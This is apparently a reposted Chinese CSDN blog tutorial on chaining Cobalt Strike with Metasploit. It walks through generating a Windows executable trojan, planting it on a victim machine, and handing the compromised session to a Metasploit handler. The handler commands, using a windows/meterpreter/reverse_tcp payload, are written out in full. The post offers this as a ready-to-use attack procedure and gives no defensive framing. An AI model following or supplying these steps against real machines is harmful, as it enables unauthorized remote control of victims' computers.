Cobalt Strike与Metasploit联动

Cobalt Strike与Metasploit联动

木马传入:

创建一个监听器,名字随便,Hosts中添加你的服务端的utl或者ip,port必须更改为没有占用的端口 

 点击攻击,选择WIndows Executable 

监听器选择刚才创建的,勾选X64,保存生成的exe木马

 将木马传入被攻击的机器

点击运行,cs上线

与Metasploit联动:

msf开启监听

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.
set lport 4444
run -j

 

创建两个监听器,一个使用windows/beacon_http/reverse_http来监听肉鸡,另一个使用windows/foreign/reverse_http来将获取到的控制权传给msf(注意:这里的端口要与msf监听的端口一致)

 

点击增加会话,添加刚才创建的监听器 

成功上线

 

猜你喜欢

转载自blog.csdn.net/qq_48985780/article/details/121869942
今日推荐